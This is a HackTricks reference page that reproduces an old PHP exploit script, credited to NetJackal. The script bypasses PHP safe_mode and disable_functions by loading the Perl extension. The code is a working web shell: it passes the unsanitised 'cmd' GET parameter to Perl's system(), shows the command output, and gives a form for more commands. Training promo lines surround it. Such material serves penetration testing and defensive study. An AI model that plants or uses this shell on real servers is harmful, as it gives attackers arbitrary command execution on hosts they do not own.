tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

PHP Perl Extension Safe_mode Bypass Exploit

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

php
<?php ######################################################### ##----------------------------------------------------### ##----PHP Perl Extension Safe_mode Bypass Exploit-----### ##----------------------------------------------------### ##-Author:--NetJackal---------------------------------### ##-Email:---nima_501[at]yahoo[dot]com-----------------### ##-Website:-http://netjackal.by.ru--------------------### ##----------------------------------------------------### ######################################################### if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'; $perl=new perl(); echo "<textarea rows='25' cols='75'>"; $perl->eval("system('".$_GET['cmd']."')"); echo "&lt;/textarea&gt;"; $_GET['cmd']=htmlspecialchars($_GET['cmd']); echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" ?>

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks